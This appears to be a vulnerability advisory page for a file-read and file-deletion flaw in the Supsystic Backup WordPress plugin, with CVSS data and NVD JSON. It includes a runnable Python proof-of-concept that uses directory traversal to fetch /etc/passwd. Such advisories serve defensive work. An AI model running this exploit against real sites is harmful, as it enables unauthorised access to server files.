Security Vulnerability Report
CVE-2020-37246 CVSS 6.2 MEDIUM

CVE-2020-37246

Published: 2026-05-16 16:16:21
Last Modified: 2026-05-18 17:32:05

Description

Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: this vector's AV:L (local attack vector) does not match the description above, which describes an unauthenticated HTTP request to admin.php; confirm the attack vector before using this score to prioritize.

Configurations (Affected Products)

No configuration data available.

Supsystic Backup <= 2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: Supsystic Backup 2.3.9 - Local File Inclusion (Unauthenticated)
# Date: 2021-01-04
# Exploit Author: VulnCheck
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-by-supsystic.zip
# Version: 2.3.9
# Tested on: WordPress 5.6 / Linux

import requests

# Query-string parameters of the single admin.php request this PoC sends.
# From the defender's side this is the request shape to look for in web-server
# logs or a WAF rule: page=backup-by-supsystic together with method=download
# and a "download" value carrying "../" traversal sequences. Versions after
# 2.3.9 are not listed as affected by the advisory, so upgrading the plugin is
# the remediation.
_PROBE_PARAMS = {
    "page": "backup-by-supsystic",
    "action": "index",
    "controller": "backup",
    "method": "download",
    "download": "../../../../../../../../etc/passwd",
}

# Separator printed around a retrieved file body.
_RULE = "-" * 40


def _report(reply):
    """Print the outcome of one probe response.

    Success is judged the same way as the original PoC: the body must contain
    "root:" and the HTTP status must be 200.  Anything else is reported as a
    failure together with the status code.
    """
    succeeded = "root:" in reply.text and reply.status_code == 200
    if not succeeded:
        print("[-] Exploit failed or file not found.")
        print(f"Status Code: {reply.status_code}")
        return
    print("[+] Exploit successful! File content retrieved:")
    print(_RULE)
    print(reply.text)
    print(_RULE)


def exploit_lfi(target_url):
    """
    Exploit the Local File Inclusion vulnerability in Supsystic Backup <= 2.3.9

    Sends one GET to ``<target_url>/wp-admin/admin.php`` with the traversal
    parameters in ``_PROBE_PARAMS`` and prints the response body when it looks
    like /etc/passwd.  Results are only printed, nothing is returned.

    Args:
        target_url: Base URL of the WordPress site; it is concatenated with
            "/wp-admin/admin.php" verbatim, so a trailing slash yields a
            double slash in the request path.

    Network errors raised by ``requests`` are caught and printed rather than
    propagated; the request is bounded by a 10 second timeout.
    """
    endpoint = f"{target_url}/wp-admin/admin.php"
    try:
        print(f"[*] Sending request to {endpoint}...")
        reply = requests.get(endpoint, params=_PROBE_PARAMS, timeout=10)
        _report(reply)
    except requests.exceptions.RequestException as err:
        print(f"[!] An error occurred: {err}")


if __name__ == "__main__":
    # Interactive entry point: prompt for the base URL and run the probe once.
    site = input("Enter the target URL (e.g., http://localhost/wordpress): ")
    exploit_lfi(site)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-37246", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:20.993", "lastModified": "2026-05-18T17:32:04.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://downloads.wordpress.org/plugin/backup-by-supsystic.zip", "source": "[email protected]"}, {"url": "https://supsystic.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49545", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-backup-local-file-inclusion", "source": "[email protected]"}]}}